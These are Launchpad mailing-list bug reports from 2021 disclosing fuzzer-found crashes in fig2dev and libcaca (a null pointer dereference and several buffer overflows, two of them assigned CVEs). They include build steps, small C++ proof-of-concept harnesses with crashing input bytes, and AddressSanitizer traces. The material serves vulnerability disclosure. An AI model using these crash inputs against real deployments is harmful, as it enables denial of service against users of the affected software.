[Touch-packages] [Bug 1926673] [NEW] Null pointer of fig2dev of gensvg.c in function svg_arrows

2021-04-29 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hi
I found a crash.

issues: https://sourceforge.net/p/mcj/tickets/114/
commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
fig2dev Version 3.2.8a

Verification steps:
1.Get the source code of fig2dev
2.Compile the fig2dev

```bash
$ cd fig2dev-3.2.8a
$ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" 
CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
$ make
```

3.run fig2dev
```bash
$ ./fig2dev -L svg fig2dev_crash
```

asan info:





http://www.w3.org/2000/svg;
xmlns:xlink="http://www.w3.org/1999/xlink;
width="73pt" height="113pt"
viewBox="-76 -376 1202 1877">





























AddressSanitizer:DEADLYSIGNAL
=
==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 
0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0)
==3255219==The signal is caused by a READ memory access.
==3255219==Hint: address points to the zero page.
#0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
#1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
#2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
#3 0x4d0847 in main 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
#4 0x7f5e0e4f50b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41c71d in _start 
(/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 in svg_arrows
==3255219==ABORTING

** Affects: xfig (Ubuntu)
 Importance: Undecided
 Assignee: xiao huang (shanzhuli)
 Status: New


** Tags: security

** Information type changed from Private Security to Public Security

** Summary changed:

-  fig2dev
+ Null pointer of fig2dev of gensvg.c in function svg_arrows

** Description changed:

  Hi
  I found an crash error.
  
  issues: https://sourceforge.net/p/mcj/tickets/114/
- 
+ 
commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/
  
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  fig2dev Version 3.2.8a
  
  Verification steps:
  1.Get the source code of fig2dev
  2.Compile the fig2dev
  
  ```bash
  $ cd fig2dev-3.2.8a
  $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" 
CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
- $ make 
+ $ make
  ```
  
  3.run fig2dev
  ```bash
  $ ./fig2dev -L svg fig2dev_crash
  ```
  
  asan info:
  
  
  
  
  
  http://www.w3.org/2000/svg;
- xmlns:xlink="http://www.w3.org/1999/xlink;
- width="73pt" height="113pt"
- viewBox="-76 -376 1202 1877">
+ xmlns:xlink="http://www.w3.org/1999/xlink;
+ width="73pt" height="113pt"
+ viewBox="-76 -376 1202 1877">
  
  
  
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  
+ stroke="#ff" stroke-width="8px"/>
  
  
  
+ stroke="#ff" stroke-width="8px"/>
  
  
  
  
  
+ x="0" y="0" width="134" height="134">
  
  
  
  
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  AddressSanitizer:DEADLYSIGNAL
  =
  ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x 
(pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0)
  ==3255219==The signal is caused by a READ memory access.
  ==3255219==Hint: address points to the zero page.
- #0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
- #1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
- #2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
- #3 0x4d0847 in main 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
- #4 0x7f5e0e4f50b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #5 0x41c71d in _start 
(/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)
+ #0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
+ #1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
+ #2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.

[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

2021-04-22 Thread xiao huang
** Description changed:

  Hello ubuntu security team
+ 
+ issues: https://github.com/cacalabs/libcaca/issues/55
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
- 
  int main(int args,char* argv[]){
  
- size_t  len = 0;
- unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
+ size_t  len = 0;
+ unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
  
- return 0;
+ return 0;
  
  }
  4.compile poc_ansi.cc
  
  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
  5.Run poc_ansi
  asan info:
  
  =
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
- #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
+ #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
  
  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
- [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
+   This frame has 1 object(s):
+ [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-   (longjmp and C++ exceptions *are* supported)
+   (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
-   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
-   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
-   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
-   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
+   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
+   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
+   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 

[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

2021-04-22 Thread xiao huang
** Description changed:

  Hello ubuntu security team
+ 
+ issues:https://github.com/cacalabs/libcaca/issues/56
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
+ 
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"bin");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"bin");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
  int main(int args,char* argv[]){
- size_t  len = 0;
- unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
- return 0;
+ size_t  len = 0;
+ unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
+ return 0;
  
  }
  4.compile poc_bin.cc
  
  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:
  
  =
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
- #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+ #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
  
  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
- [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
+   This frame has 1 object(s):
+ [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-   (longjmp and C++ exceptions *are* supported)
+   (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
-   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

[Touch-packages] [Bug 1925467] [NEW] stack-buffer-overflow of text.c in function _import_ansi

2021-04-22 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
$ make
3.Create the poc_ansi.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include 
#include 
#include 
#include 
#include 
#include 

using namespace std;

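// Import Size bytes of Data into a fresh libcaca canvas with the "ansi"
// codec, then release the canvas. Inputs shorter than 8 bytes are skipped.
// Data is only read; nothing is returned or reported to the caller.
void crash(const uint8_t *Data, size_t Size) {
  if(Size<8) return ;
  caca_canvas_t *cv = caca_create_canvas(0,0);
  // caca_create_canvas() returns NULL on failure; without this check the
  // calls below would dereference a null canvas instead of exercising the
  // importer under test.
  if(cv == NULL) return;
  caca_create_frame(cv,0);
  caca_set_frame(cv,0);
  caca_import_canvas_from_memory(cv,Data,Size,"ansi");
  caca_free_canvas(cv);
}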


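// Build the fixed 10-byte input and hand it to crash(). The command-line
// arguments are not used.
int main(int args,char* argv[]){
  (void)args;
  (void)argv;
  unsigned char buffer[] =
    {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
  size_t len = sizeof(buffer)/sizeof(buffer[0]);
  // %zu is the conversion for size_t; passing it to %d is undefined
  // behaviour and mis-prints where int and size_t differ in width.
  printf("%zu\n", len);
  crash((const uint8_t*)buffer,len);
  return 0;
}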
4.compile poc_ansi.cc

clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
5.Run poc_ansi
asan info:

=
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
#0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
#1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
[32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
  (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
Shadow bytes around the buggy address:
  0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
  0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
  0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
  0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:   00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:   fa
  Freed heap region:   fd
  Stack left redzone:  f1
  Stack mid redzone:   f2
  Stack right redzone: f3
  Stack after return:  f5
  Stack use after scope:   f8
  Global redzone:  f9
  Global init order:   f6
  Poisoned by user:f7
  Container overflow:  fc
  Array cookie:ac
  Intra object redzone:bb
  ASan internal:   fe
  Left alloca redzone: ca
  Right alloca redzone:cb
  Shadow gap:  cc
==3763372==ABORTING
Thanks

** Affects: libcaca (Ubuntu)
 Importance: Undecided
 Status: New

** Information type changed from Public to Public Security

-- 
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello ubuntu security team
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ 

[Touch-packages] [Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin

2021-04-22 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include 
#include 
#include 
#include 
#include 
#include 

using namespace std;

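// Import Size bytes of Data into a fresh libcaca canvas with the "bin"
// codec, then release the canvas. Inputs shorter than 8 bytes are skipped.
// Data is only read; nothing is returned or reported to the caller.
void crash(const uint8_t *Data, size_t Size) {
  if(Size<8) return ;
  caca_canvas_t *cv = caca_create_canvas(0,0);
  // caca_create_canvas() returns NULL on failure; without this check the
  // calls below would dereference a null canvas instead of exercising the
  // importer under test.
  if(cv == NULL) return;
  caca_create_frame(cv,0);
  caca_set_frame(cv,0);
  caca_import_canvas_from_memory(cv,Data,Size,"bin");
  caca_free_canvas(cv);
}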

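// Build the fixed 13-byte input and hand it to crash(). The command-line
// arguments are not used.
int main(int args,char* argv[]){
  (void)args;
  (void)argv;
  unsigned char buffer[] =
    {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
  size_t len = sizeof(buffer)/sizeof(buffer[0]);
  // %zu is the conversion for size_t; passing it to %d is undefined
  // behaviour and mis-prints where int and size_t differ in width.
  printf("%zu\n", len);
  crash((const uint8_t*)buffer,len);
  return 0;
}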
4.compile poc_bin.cc

clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  -I./caca/ 
-lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
5.Run poc_bin
asan info:

=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
  (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
  0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
  0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:   00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:   fa
  Freed heap region:   fd
  Stack left redzone:  f1
  Stack mid redzone:   f2
  Stack right redzone: f3
  Stack after return:  f5
  Stack use after scope:   f8
  Global redzone:  f9
  Global init order:   f6
  Poisoned by user:f7
  Container overflow:  fc
  Array cookie:ac
  Intra object redzone:bb
  ASan internal:   fe
  Left alloca redzone: ca
  Right alloca redzone:cb
  Shadow gap:  cc
==3817476==ABORTING

Thanks

** Affects: libcaca (Ubuntu)
 Importance: Undecided
 Status: New

** Information type changed from Public to Public Security

-- 
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello ubuntu security team
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd 

[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-12 Thread xiao huang
The issues have been assigned CVE-2021-30498 and CVE-2021-30499.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499

-- 
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code files (as in the call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

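  // libFuzzer entry point: copy the input into a NUL-terminated buffer, import
  // it into each of four canvas frames with the default ("") codec, export the
  // canvas with the "troff" codec and free everything. Always returns 0, as
  // libFuzzer requires (the original fell off the end of a non-void function).
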